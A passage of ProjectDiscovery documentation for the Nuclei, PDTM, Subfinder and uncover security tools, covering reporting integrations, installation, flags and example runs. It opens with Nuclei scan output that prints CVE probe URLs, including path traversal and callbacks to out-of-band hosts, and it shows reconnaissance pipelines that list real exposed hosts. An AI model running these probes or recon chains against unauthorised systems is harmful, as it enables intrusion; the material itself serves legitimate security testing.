[CVE-2018-15517] [http] [high] http://honey.scanme.sh/index.php/System/MailConnect/host/clk37fcdiuf176s376hgi5j3fsht3dchj.oast.live/port/80/secure/
[CVE-2021-45967] [http] [critical] http://honey.scanme.sh/services/pluginscript/..;/..;/..;/getFavicon?host=clk37fcdiuf176s376hgh1y3xjzb3yjpy.oast.live
[CVE-2021-26855] [http] [critical] http://honey.scanme.sh/owa/auth/x.js
[INF] Scan results uploaded! View them at https://cloud.projectdiscovery.io/scans/clk37krsr14s73afc3ag
```
After the scan, a URL will be displayed on the command line interface. Visit this URL to check your results on the Cloud Dashboard.
### Advanced Integration Options
**Setting API key via environment variable**
Avoid entering your API key via interactive prompt by setting it via environment variable.
```sh
export PDCP_API_KEY=XXXX-XXXX
```
**Enabling result upload by default**
If you want all your scans to automatically upload results to the cloud, enable the `ENABLE_CLOUD_UPLOAD` environment variable.
```sh
export ENABLE_CLOUD_UPLOAD=true
```
**Disabling cloud upload warnings**
To suppress warnings about result uploads, disable the `DISABLE_CLOUD_UPLOAD_WRN` environment variable.
```sh
export DISABLE_CLOUD_UPLOAD_WRN=true
```
Your configured PDCP API key stored in `$HOME/.pdcp/credentials.yaml`
Nuclei OSS results uploaded to the cloud platform are scheduled for automatic cleanup after 30 days, although this duration is subject to change as we gauge user feedback and requirement.
## Nuclei Reporting
Nuclei comes with reporting module support with the release of v2.3.0 supporting GitHub, GitLab, and Jira integration, this allows nuclei engine to create automatic tickets on the supported platform based on found results.
| Platform | GitHub | GitLab | Jira | Markdown | SARIF | Elasticsearch | Splunk HEC | MongoDB |
| -------- | :----: | :----: | :--: | :------: | :---: | :-----------: | :--------: | :-----: |
| Support | ✔ | ✔ | ✔ | ✔ | ✔ | ✔ | ✔ | ✔ |
`-rc, -report-config` flag can be used to provide a config file to read configuration details of the platform to integrate. Here is an [example config file](https://github.com/projectdiscovery/nuclei/blob/main/cmd/nuclei/issue-tracker-config.yaml) for all supported platforms.
For example, to create tickets on GitHub, create a config file with the following content and replace the appropriate values:
```yaml
# GitHub contains configuration options for GitHub issue tracker
github:
username: '$user'
owner: '$user'
token: '$token'
project-name: 'testing-project'
issue-label: 'Nuclei'
duplicate-issue-check: true
```
Alternatively if you use GitLab, create a config file following content and replace the appropriate values:
```yaml
# GitLab contains configuration options for GitLab issue tracker
gitlab:
username: '$user'
base-url: 'gitlab.com'
token: '$token'
project-name: 'testing-project'
issue-label: 'nuclei-label'
severity-as-label: true
duplicate-issue-check: true
```
To store results in Elasticsearch, create a config file with the following content and replace the appropriate values:
```yaml
# elasticsearch contains configuration options for elasticsearch exporter
elasticsearch:
# IP for elasticsearch instance
ip: 127.0.0.1
# Port is the port of elasticsearch instance
port: 9200
# IndexName is the name of the elasticsearch index
index-name: nuclei
```
To forward results to Splunk HEC, create a config file with the following content and replace the appropriate values:
```yaml
# splunkhec contains configuration options for splunkhec exporter
splunkhec:
# Hostname for splunkhec instance
host: '$hec_host'
# Port is the port of splunkhec instance
port: 8088
# IndexName is the name of the splunkhec index
index-name: nuclei
# SSL enables ssl for splunkhec connection
ssl: true
# SSLVerification disables SSL verification for splunkhec
ssl-verification: true
# HEC Token for the splunkhec instance
token: '$hec_token'
```
To forward results to Jira, create a config file with the following content and replace the appropriate values:
The Jira reporting options allows for custom fields, as well as using variables from the Nuclei templates in those custom fields.
The supported variables currently are: `$CVSSMetrics`, `$CVEID`, `$CWEID`, `$Host`, `$Severity`, `$CVSSScore`, `$Name`
In addition, Jira is strict when it comes to custom field entry. If the field is a dropdown, Jira accepts only the case sensitive specific string and the API call is slightly different. To support this, there are three types of customfields.
* `name` is the dropdown value
* `id` is the ID value of the dropdown
* `freeform` is if the customfield the entry of any value
To avoid duplication, the JQL query run can be slightly modified by the config file.
The `CLOSED_STATUS` can be changed in the Jira template file using the `status-not` variable.
`summary ~ TEMPLATE_NAME AND summary ~ HOSTNAME AND status != CLOSED_STATUS`
```yaml
jira:
# cloud is the boolean which tells if Jira instance is running in the cloud or on-prem version is used
cloud: true
# update-existing is the boolean which tells if the existing, opened issue should be updated or new one should be created
update-existing: false
# URL is the jira application url
url: https://localhost/jira
# account-id is the account-id of the Jira user or username in case of on-prem Jira
account-id: test-account-id
# email is the email of the user for Jira instance
email: test@test.com
# token is the token for Jira instance or password in case of on-prem Jira
token: test-token
#project-name is the name of the project.
project-name: test-project-name
#issue-type is the name of the created issue type (case sensitive)
issue-type: Bug
# SeverityAsLabel (optional) sends the severity as the label of the created issue
# User custom fields for Jira Cloud instead
severity-as-label: true
# Whatever your final status is that you want to use as a closed ticket - Closed, Done, Remediated, etc
# When checking for duplicates, the JQL query will filter out status's that match this.
# If it finds a match _and_ the ticket does have this status, a new one will be created.
status-not: Closed
# Customfield supports name, id and freeform. name and id are to be used when the custom field is a dropdown.
# freeform can be used if the custom field is just a text entry
# Variables can be used to pull various pieces of data from the finding itself.
# Supported variables: $CVSSMetrics, $CVEID, $CWEID, $Host, $Severity, $CVSSScore, $Name
custom_fields:
customfield_00001:
name: 'Nuclei'
customfield_00002:
freeform: $CVSSMetrics
customfield_00003:
freeform: $CVSSScore
```
To write results to a MongoDB database collection, update the config file with the connection information.
```yaml
mongodb:
# the connection string to the MongoDB database
# (e.g., mongodb://root:example@localhost:27017/nuclei?ssl=false&authSource=admin)
connection-string: ""
# the name of the collection to store the issues
collection-name: ""
# excludes the Request and Response from the results (helps with filesize)
omit-raw: false
# determines the number of results to be kept in memory before writing it to the database or 0 to
# persist all in memory and write all results at the end (default)
batch-size: 0
```
**Running nuclei with reporting module:**
```bash
nuclei -l urls.txt -t cves/ -rc issue-tracker.yaml
```
Similarly, other platforms can be configured. Reporting module also supports basic filtering and duplicate checks to avoid duplicate ticket creation.
```yaml
allow-list:
severity: high,critical
```
This will ensure to only creating tickets for issues identified with **high** and **critical** severity; similarly, `deny-list` can be used to exclude issues with a specific severity.
If you are running periodic scans on the same assets, you might want to consider `-rdb, -report-db` flag that creates a local copy of the valid findings in the given directory utilized by reporting module to compare and **create tickets for unique issues only**.
```bash
nuclei -l urls.txt -t cves/ -rc issue-tracker.yaml -rdb prod
```
**Markdown Export**
Nuclei supports markdown export of valid findings with `-me, -markdown-export` flag, this flag takes directory as input to store markdown formatted reports.
Including request/response in the markdown report is optional, and included when `-irr, -include-rr` flag is used along with `-me`.
```bash
nuclei -l urls.txt -t cves/ -irr -markdown-export reports
```
**SARIF Export**
Nuclei supports SARIF export of valid findings with `-se, -sarif-export` flag. This flag takes a file as input to store SARIF formatted report.
```bash
nuclei -l urls.txt -t cves/ -sarif-export report.sarif
```
It is also possible to visualize Nuclei results using **SARIF** files.
1. By uploading a SARIF file to [SARIF Viewer](https://microsoft.github.io/sarif-web-component/)
2. By uploading a SARIF file to [Github Actions](https://docs.github.com/en/code-security/code-scanning/integrating-with-code-scanning/uploading-a-sarif-file-to-github)
More info on the SARIF output is documented [here](https://github.com/projectdiscovery/nuclei/pull/2925).
These are **not official** viewers of Nuclei and `Nuclei` has no liability
towards any of these options to visualize **Nuclei** results. These are just
some publicly available options to visualize SARIF files.
## Scan **Metrics**
Nuclei expose running scan metrics on a local port `9092` when `-metrics` flag is used and can be accessed at **localhost:9092/metrics**, default port to expose scan information is configurable using `-metrics-port` flag.
Here is an example to query `metrics` while running nuclei as following `nuclei -t cves/ -l urls.txt -metrics`
```bash
curl -s localhost:9092/metrics | jq .
```
```json
{
"duration": "0:00:03",
"errors": "2",
"hosts": "1",
"matched": "0",
"percent": "99",
"requests": "350",
"rps": "132",
"startedAt": "2021-03-27T18:02:18.886745+05:30",
"templates": "256",
"total": "352"
}
```
## Passive Scan
Nuclei engine supports passive mode scanning for HTTP based template utilizing file support, with this support we can run HTTP based templates against locally stored HTTP response data collected from any other tool.
```sh
nuclei -passive -target http_data
```
Passive mode support is limited for templates having `{{BasedURL}}` or `{{BasedURL/}}` as base path.
## Running With Docker
If Nuclei was installed within a Docker container based on the [installation instructions](./install),
the executable does not have the context of the host machine. This means that the executable will not be able to access
local files such as those used for input lists or templates. To resolve this, the container should be run with volumes
mapped to the local filesystem to allow access to these files.
### Basic Usage
This example runs a Nuclei container against `google.com`, prints the results to JSON and removes the container once it
has completed:
```sh
docker run --rm projectdiscovery/nuclei -u google.com -jsonl
```
### Using Volumes
This example runs a Nuclei container against a list of URLs, writes the results to a `.jsonl` file and removes the
container once it has completed.
```sh
# This assumes there's a file called `urls.txt` in the current directory
docker run --rm -v ./:/app/ projectdiscovery/nuclei -l /app/urls.txt -jsonl /app/results.jsonl
# The results will be written to `./results.jsonl` on the host machine once the container has completed
```
# PDTM Install
Learn how to install PDTM and get started
Enter the command below in a terminal to install ProjectDiscovery's Chaos Client using Go.
```sh
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest
```
```bash
https://github.com/projectdiscovery/pdtm/releases
```
* Download the latest binary for your OS.
* Unzip the ready-to-run binary.
## Installation Notes
* PDTM requires the latest version of [**Go**](https://go.dev/doc/install)
* Frojects are installed by downloading the released project binary. This means that projects can only be installed on the platforms for which binaries have been published.
* The path $HOME/.pdtm/go/bin is added to the $PATH variable by default
# PDTM Overview
Use ProjectDiscovery Tool Manager to download and organize your tools
ProjectDiscovery Tool Manager or PDTM is an easy way to download and keep your ProjectDiscovery tools organized and easy to access, update, and more. For users interestd in taking advantage of multiple ProjectDiscovery tools we recommend downloading PDTM rather than downloading the binary for each tool separately.
Check out [the great blog](https://blog.projectdiscovery.io/getting-started-with-projectdiscovery-in-linux-and-windows/) for getting started with ProjectDiscovery tools using Linux and Windows.
You can access the PDTM [GitHub repo here](https://github.com/projectdiscovery/pdtm).
## Support
Questions about using Chaos? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running PDTM
Learn about PDTM with examples including commands and output
For all of the flags and options available for `PDTM` be sure to check out the [Usage](/tools/pdtm/usage) page. On this page we'll share an example of running PDTM.
If you have questions, reach out to us through [Help](/help).
## Basic Example
```console
$ pdtm -install-all
____
____ ____/ / /_____ ___
/ __ \/ __ / __/ __ __ \
/ /_/ / /_/ / /_/ / / / / /
/ .___/\__,_/\__/_/ /_/ /_/
/_/ v0.0.1
projectdiscovery.io
[INF] Installed httpx v1.1.1
[INF] Installed nuclei v2.6.3
[INF] Installed naabu v2.6.3
[INF] Installed dnsx v2.6.3
```
# PDTM Usage
Learn PDTM usage including flags and options
## Access help
Use `pdtm - h` to display all help options.
## PDTM options
```console
Usage:
./pdtm [flags]
Flags:
CONFIG:
-config string cli flag configuration file (default "$HOME/.config/pdtm/config.yaml")
-bp, -binary-path string custom location to download project binary (default "$HOME/.pdtm/go/bin")
INSTALL:
-i, -install string[] install single or multiple project by name (comma separated)
-ia, -install-all install all the projects
-ip, -install-path append path to PATH environment variables
UPDATE:
-u, -update string[] update single or multiple project by name (comma separated)
-ua, -update-all update all the projects
-up, -self-update update pdtm to latest version
-duc, -disable-update-check disable automatic pdtm update check
REMOVE:
-r, -remove string[] remove single or multiple project by name (comma separated)
-ra, -remove-all remove all the projects
-rp, -remove-path remove path from PATH environment variables
DEBUG:
-sp, -show-path show the current binary path then exit
-version show version of the project
-v, -verbose show verbose output
-nc, -no-color disable output content coloring (ANSI escape codes)
-disable-changelog, -dc disable release changelog in output
```
# Installing Subfinder
Learn about how to install and get started with Subfinder
```bash
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
```
Subfinder requires the latest **GO** version to install successfully.
```bash
brew install subfinder
```
Supported in **macOS** (or Linux)
```bash
docker pull projectdiscovery/subfinder:latest
```
{/* Docker-specific usage instructions can be found [here](./running#running-with-docker). */}
```bash
git clone https://github.com/projectdiscovery/subfinder.git; \
cd subfinder/v2/cmd/subfinder; \
go build; \
mv subfinder /usr/local/bin/; \
subfinder -version;
```
Subfinder require the latest **GO** version to install successfully.
```bash
https://github.com/projectdiscovery/subfinder/releases
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation notes
* Subfinder requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export PATH=$PATH:$HOME/go/bin >> $home/.bashrc
source $home/.bashrc
```
* To add the path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/subfinder`
## Post install configuration
Subfinder is available immediately after installation, however the following services require the configuration of API keys to work:
[BeVigil](https://bevigil.com/osint-api), [BinaryEdge](https://binaryedge.io), [BufferOver](https://tls.bufferover.run), [C99](https://api.c99.nl/), [Censys](https://censys.io), [CertSpotter](https://sslmate.com/certspotter/api/), [Chaos](https://chaos.projectdiscovery.io),
[Chinaz](http://my.chinaz.com/ChinazAPI/DataCenter/MyDataApi), [DNSDB](https://api.dnsdb.info), [Fofa](https://fofa.info/static_pages/api_help), [FullHunt](https://fullhunt.io), [GitHub](https://github.com), [Intelx](https://intelx.io),
[PassiveTotal](http://passivetotal.org), [quake](https://quake.360.cn), [Robtex](https://www.robtex.com/api/), [SecurityTrails](http://securitytrails.com), [Shodan](https://shodan.io), [ThreatBook](https://x.threatbook.cn/en),
[VirusTotal](https://www.virustotal.com), [WhoisXML API](https://whoisxmlapi.com/), ZoomEye API [china](https://api.zoomeye.org) - [worldwide](https://api.zoomeye.hk),
[dnsrepo](https://dnsrepo.noc.org), [Hunter](https://hunter.qianxin.com/), [Facebook](https://developers.facebook.com), [BuiltWith](https://api.builtwith.com/domain-api)
You can also use the `subfinder -ls` command to display all the available sources.
These values are stored in the `$HOME/.config/subfinder/provider-config.yaml` file which will be created when you run the tool for the first time.
The configuration file uses the YAML format. Multiple API keys can be specified for each of these services from which one of them will be used for enumeration.
Composite keys for sources like, Censys, PassiveTotal, Fofa, Intellix and 360quake, need to be separated with a colon (:).
## Example provider config
An example provider config file:
```
binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
redhuntlabs:
- ENDPOINT:API_TOKEN
- https://reconapi.redhuntlabs.com/community/v1/domains/subdomains:joEPzJJp2AuOCw7teAj63HYrPGnsxuPQ
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeyeapi:
- zoomeye.hk:4f73021d-ff95-4f53-937f-83d6db719eec
quake:
- 0cb9030c-0a40-48a3-b8c4-fca28e466ba3
facebook:
- APP_ID:APP_SECRET
intelx:
- HOST:API_KEY
- 2.intelx.io:s4324-b98b-41b2-220e8-3320f6a1284d
```
## RedHunt Lab Attack Surface Recon API
RedHunt Labs's [Attack Surface Recon API](https://devportal.redhuntlabs.com/) has different API endpoints depending on the user's subscription. Make sure to add the appropriate endpoint before running any scans.
## ZoomEye API
Before conducting any scans, please ensure you are using the correct host to comply with geographical access restrictions of the ZoomEye API:
* **zoomeye.org** is exclusively for users within China.
* **zoomeye.hk** is for users outside China.
# Subfinder Overview
A robust discovery tool for passive enumeration on valid subdomains
## What is **Subfinder?**
Subfinder is a subdomain discovery tool that finds and returns valid subdomains for websites.
Using passive online sources, it has a simple modular architecture optimized for speed. Subfinder is built for one thing - passive subdomain enumeration, and it does that very well.
Subfinder complies with all the passive source licenses and usage restrictions for its sources. The passive model guarantees speed and stealthiness that can be leveraged by both penetration testers and bug bounty hunters alike.
[Check out this post on all of Subfinder's features](https://blog.projectdiscovery.io/do-you-really-know-subfinder-an-in-depth-guide-to-all-features-of-subfinder-beginner-to-advanced/) from the ProjectDiscovery Blog for more.
## Features and capabilities
* Fast and powerful resolution and wildcard elimination modules
* Curated passive sources to maximize results
* Multiple supported output formats (JSON, file, stdout)
* Optimized for speed and lightweight on resources
* STDIN/OUT support enables easy integration into workflows
## Additional Subfinder resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://securitytrails.com/blog/subfinder](https://securitytrails.com/blog/subfinder)
* [https://dhiyaneshgeek.github.io/bug/bounty/2020/02/06/recon-with-me/](https://dhiyaneshgeek.github.io/bug/bounty/2020/02/06/recon-with-me/)
* [https://dhiyaneshgeek.github.io/research,bug/bounty/2024/01/03/subfinder-securitytrails/](https://dhiyaneshgeek.github.io/research,bug/bounty/2024/01/03/subfinder-securitytrails/)
## Support
Questions about using Subfinder? Issues working through installation? Cool story or use case you want to share? Get in touch! Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running
Learn about running Subfinder with examples including commands and output
For all of the flags and options available for `Subfinder` be sure to check out the [Usage](/tools/subfinder/usage) page. On this page we'll share examples running Subfinder with specific flags and goals
and the output you can expect from each. *If you have questions, reach out to us through [Help](/help).*
## Basic Usage
To run Subfinder on a specific target use the `-d` flag to specify the domain.
```
subfinder -d hackerone.com
__ _____ __
_______ __/ /_ / __(_)___ ____/ /__ _____
/ ___/ / / / __ \/ /_/ / __ \/ __ / _ \/ ___/
(__ ) /_/ / /_/ / __/ / / / / /_/ / __/ /
/____/\__,_/_.___/_/ /_/_/ /_/\__,_/\___/_/ v2.4.9
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
By using subfinder, you also agree to the terms of the APIs used.
[INF] Enumerating subdomains for hackerone.com
www.hackerone.com
support.hackerone.com
links.hackerone.com
api.hackerone.com
o1.email.hackerone.com
go.hackerone.com
3d.hackerone.com
resources.hackerone.com
a.ns.hackerone.com
b.ns.hackerone.com
mta-sts.hackerone.com
docs.hackerone.com
mta-sts.forwarding.hackerone.com
gslink.hackerone.com
hackerone.com
info.hackerone.com
mta-sts.managed.hackerone.com
events.hackerone.com
[INF] Found 18 subdomains for hackerone.com in 3 seconds 672 milliseconds
```
## Pipe Results to Other Tools
The subdomains discovered can be piped to other tools. For example, you can pipe the discovered subdomains to httpx which will then find running HTTP servers on the host.
```
echo hackerone.com | subfinder -silent | httpx -silent
http://hackerone.com
http://www.hackerone.com
http://docs.hackerone.com
http://api.hackerone.com
https://docs.hackerone.com
http://mta-sts.managed.hackerone.com
```
## Subfinder and Docker
Pull the latest tagged `subfinder` Docker image using:
```
docker pull projectdiscovery/subfinder:latest
```
Run `subfinder` using the Docker image:
```
docker run projectdiscovery/subfinder:latest -d hackerone.com
```
Run `subfinder` using the Docker image with a local config file:
```
docker run -v $CONFIG/subfinder:/root/.config/subfinder -t projectdiscovery/subfinder -d hackerone.com
```
## Subfinder Go library
`subfinder` can also be used as library and a minimal examples of using subfinder SDK is available [in the example library.](https://github.com/projectdiscovery/subfinder/blob/dev/v2/examples/main.go)
# Subfinder Usage
Learn Subfinder usage including input, flags, and filters
## Access help
Use `subfinder -h` to display all help options.
## Subfinder help options
```
Flags:
INPUT:
-d, -domain string[] domains to find subdomains for
-dL, -list string file containing list of domains for subdomain discovery
SOURCE:
-s, -sources string[] specific sources to use for discovery (-s crtsh,github). Use -ls to display all available sources.
-recursive use only sources that can handle subdomains recursively (e.g. subdomain.domain.tld vs domain.tld)
-all use all sources for enumeration (slow)
-es, -exclude-sources string[] sources to exclude from enumeration (-es alienvault,zoomeyeapi)
FILTER:
-m, -match string[] subdomain or list of subdomain to match (file or comma separated)
-f, -filter string[] subdomain or list of subdomain to filter (file or comma separated)
RATE-LIMIT:
-rl, -rate-limit int maximum number of http requests to send per second
-rls value maximum number of http requests to send per second four providers in key=value format (-rls "hackertarget=10/s,shodan=15/s")
-t int number of concurrent goroutines for resolving (-active only) (default 10)
UPDATE:
-up, -update update subfinder to latest version
-duc, -disable-update-check disable automatic subfinder update check
OUTPUT:
-o, -output string file to write output to
-oJ, -json write output in JSONL(ines) format
-oD, -output-dir string directory to write output (-dL only)
-cs, -collect-sources include all sources in the output (-json only)
-oI, -ip include host IP in output (-active only)
CONFIGURATION:
-config string flag config file (default "$CONFIG/subfinder/config.yaml")
-pc, -provider-config string provider config file (default "$CONFIG/subfinder/provider-config.yaml")
-r string[] comma separated list of resolvers to use
-rL, -rlist string file containing list of resolvers to use
-nW, -active display active subdomains only
-proxy string http proxy to use with subfinder
-ei, -exclude-ip exclude IPs from the list of domains
DEBUG:
-silent show only subdomains in output
-version show version of subfinder
-v show verbose output
-nc, -no-color disable color in output
-ls, -list-sources list all available sources
OPTIMIZATION:
-timeout int seconds to wait before timing out (default 30)
-max-time int minutes to wait for enumeration results (default 10)
```
# uncover Install
Learn how to install uncover and get started
Enter the command below in a terminal to install uncover using Go.
```bash
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest
```
## Installation Notes
* uncover requires the latest version of [**Go**](https://go.dev/doc/install)
# uncover Overview
A Go wrapper using APIs to discover exposed hosts
`uncover` is a Go wrapper using APIs from well known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and use the results with your current pipeline tools.
The uncover [GitHub repo is available here](https://github.com/projectdiscovery/uncover)
## Features
* Query multiple search engine at once
* Available Search engine support
* [Shodan](https://www.shodan.io)
* [Censys](https://search.censys.io)
* [FOFA](https://fofa.info)
* [Hunter](https://hunter.qianxin.com)
* [Quake](https://quake.360.net/quake/#/index)
* [Zoomeye](https://www.zoomeye.org)
* [Netlas](https://netlas.io/)
* [CriminalIP](https://www.criminalip.io)
* [PublicWWW](https://publicwww.com)
* [HunterHow](https://hunter.how)
* Multiple API key input support
* Automatic API key randomization
* **stdin** / **stdout** support for input
## Support
Questions about using `uncover`? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running uncover
Learn about running uncover including examples
## Basic Usage
For all of the flags and options available for **uncover** be sure to check out the [Usage](/tools/uncover/usage) page.
If you have questions, reach out to us through [Help](/help).
### Default run:
**uncover** supports multiple ways to make the query including **stdin** or `q` flag, as default `shodan` engine is used for search if no engine is specified.
```console
echo 'ssl:"Uber Technologies, Inc."' | uncover
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
107.180.12.116:993
107.180.26.155:443
104.244.99.31:443
161.28.20.79:443
104.21.8.108:443
198.71.233.203:443
104.17.237.13:443
162.255.165.171:443
12.237.119.61:443
192.169.250.211:443
104.16.251.50:443
```
Running **uncover** with **file** input containing multiple search queries per line.
```console
cat dorks.txt
ssl:"Uber Technologies, Inc."
title:"Grafana"
```
```console
uncover -q dorks.txt
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
107.180.12.116:993
107.180.26.155:443
104.244.99.31:443
161.28.20.79:443
104.21.8.108:443
198.71.233.203:443
2607:7c80:54:3::74:3001
104.198.55.35:80
46.101.82.244:3000
34.147.126.112:80
138.197.147.213:8086
```
### Single query against multiple search engines
**uncover** supports multiple search engine, as default **shodan** is used, `-e` flag can be used to run same query against any or all search engines.
```console
echo jira | uncover -e shodan,censys,fofa,quake,hunter,zoomeye,netlas,criminalip
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
176.31.249.189:5001
13.211.116.80:443
43.130.1.221:631
192.195.70.29:443
52.27.22.181:443
117.48.120.226:8889
106.52.115.145:49153
13.69.135.128:443
193.35.99.158:443
18.202.109.218:8089
101.36.105.97:21379
42.194.226.30:2626
```
### Multiple queries against multiple search engines
```console
uncover -shodan 'http.component:"Atlassian Jira"' -censys 'services.software.product=`Jira`' -fofa 'app="ATLASSIAN-JIRA"' -quake 'Jira' -hunter 'Jira' -zoomeye 'app:"Atlassian JIRA"' -netlas 'jira' -criminalip 'Jira'
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
104.68.37.129:443
162.222.160.42:443
34.255.84.133:443
52.204.121.166:443
23.198.29.120:443
136.156.180.95:443
54.194.233.15:443
104.117.55.155:443
149.81.4.6:443
54.255.218.95:443
3.223.137.57:443
83.228.124.171:443
23.202.195.82:443
52.16.59.25:443
18.159.145.227:443
104.105.53.236:443
```
### Shodan-InternetDB API
**uncover** supports [shodan-internetdb](https://internetdb.shodan.io) API to pull available ports for given IP/CIDR input.
`shodan-idb` used as **default** engine when **IP/CIDR** is provided as input, otherwise `shodan` search engine is used.
```console
echo 51.83.59.99/24 | uncover
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
51.83.59.1:53
51.83.59.1:10000
51.83.59.2:53
51.83.59.3:25
51.83.59.3:80
51.83.59.3:389
51.83.59.3:443
51.83.59.3:465
51.83.59.3:587
51.83.59.3:993
```
### Field Format
`-f, -field` flag can be used to indicate which fields to return, currently, `ip`, `port`, and `host` are supported and can be used to return desired fields.
```console
uncover -q jira -f host -silent
ec2-44-198-22-253.compute-1.amazonaws.com
ec2-18-246-31-139.us-west-2.compute.amazonaws.com
tasks.devrtb.com
leased-line-91-149-128-229.telecom.by
74.242.203.213.static.inetbone.net
ec2-52-211-7-108.eu-west-1.compute.amazonaws.com
ec2-54-187-161-180.us-west-2.compute.amazonaws.com
185-2-52-226.static.nucleus.be
ec2-34-241-80-255.eu-west-1.compute.amazonaws.com
```
### Field Formatting
**uncover** has a `-f, -field` flag that can be used to customize the output format. For example, in the case of `uncover -f https://ip:port/version`, ip:port will be replaced with results in the output while keeping the format defined, It can also be used to specify a known scheme/path/file in order to prepare the output so that it can be immediately passed as input to other tools in the pipeline.
```console
echo kubernetes | uncover -f https://ip:port/version -silent
https://35.222.229.38:443/version
https://52.11.181.228:443/version
https://35.239.255.1:443/version
https://34.71.48.11:443/version
https://130.211.54.173:443/version
https://54.184.250.232:443/version
```
Output of **uncover** can be further piped to other projects in workflow accepting **stdin** as input, for example:
* `uncover -q example -f ip | naabu` - Runs [naabu](https://github.com/projectdiscovery/naabu) for port scanning on the found host.
* `uncover -q title:GitLab | httpx` - Runs [httpx](https://github.com/projectdiscovery/httpx) for web server probing the found result.
* `uncover -q 51.83.59.99/24 | httpx` - Runs [httpx](https://github.com/projectdiscovery/naabu) on host/ports obtained from shodan-internetdb.
```console
uncover -q http.title:GitLab -silent | httpx -silent
https://15.185.150.109
https://139.162.137.16
https://164.68.115.243
https://135.125.215.186
https://163.172.59.119
http://15.236.10.197
https://129.206.117.248
```
* `uncover -q 'org:"Example Inc."' | httpx | nuclei` - Runs [httpx](https://github.com/projectdiscovery/httpx) / [nuclei](https://github.com/projectdiscovery/nuclei) for vulnerability assessment.
![image](https://user-images.githubusercontent.com/8293321/156753063-86ea4c5d-92ad-4c24-a7af-871c12aa278c.png)
# uncover Usage
Learn uncover usage including flags and filters
## Access help
Use `uncover -h` to display all of the help options.
## uncover options
```console
Usage:
./uncover [flags]
Flags:
INPUT:
-q, -query string[] search query, supports: stdin,file,config input (example: -q 'example query', -q 'query.txt')
-e, -engine string[] search engine to query (shodan,shodan-idb,fofa,censys,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow) (default shodan)
SEARCH-ENGINE:
-s, -shodan string[] search query for shodan (example: -shodan 'query.txt')
-sd, -shodan-idb string[] search query for shodan-idb (example: -shodan-idb 'query.txt')
-ff, -fofa string[] search query for fofa (example: -fofa 'query.txt')
-cs, -censys string[] search query for censys (example: -censys 'query.txt')
-qk, -quake string[] search query for quake (example: -quake 'query.txt')
-ht, -hunter string[] search query for hunter (example: -hunter 'query.txt')
-ze, -zoomeye string[] search query for zoomeye (example: -zoomeye 'query.txt')
-ne, -netlas string[] search query for netlas (example: -netlas 'query.txt')
-cl, -criminalip string[] search query for criminalip (example: -criminalip 'query.txt')
-pw, -publicwww string[] search query for publicwww (example: -publicwww 'query.txt')
-hh, -hunterhow string[] search query for hunterhow (example: -hunterhow 'query.txt')
CONFIG:
-pc, -provider string provider configuration file (default "$CONFIG/uncover/provider-config.yaml")
-config string flag configuration file (default "$CONFIG/uncover/config.yaml")
-timeout int timeout in seconds (default 30)
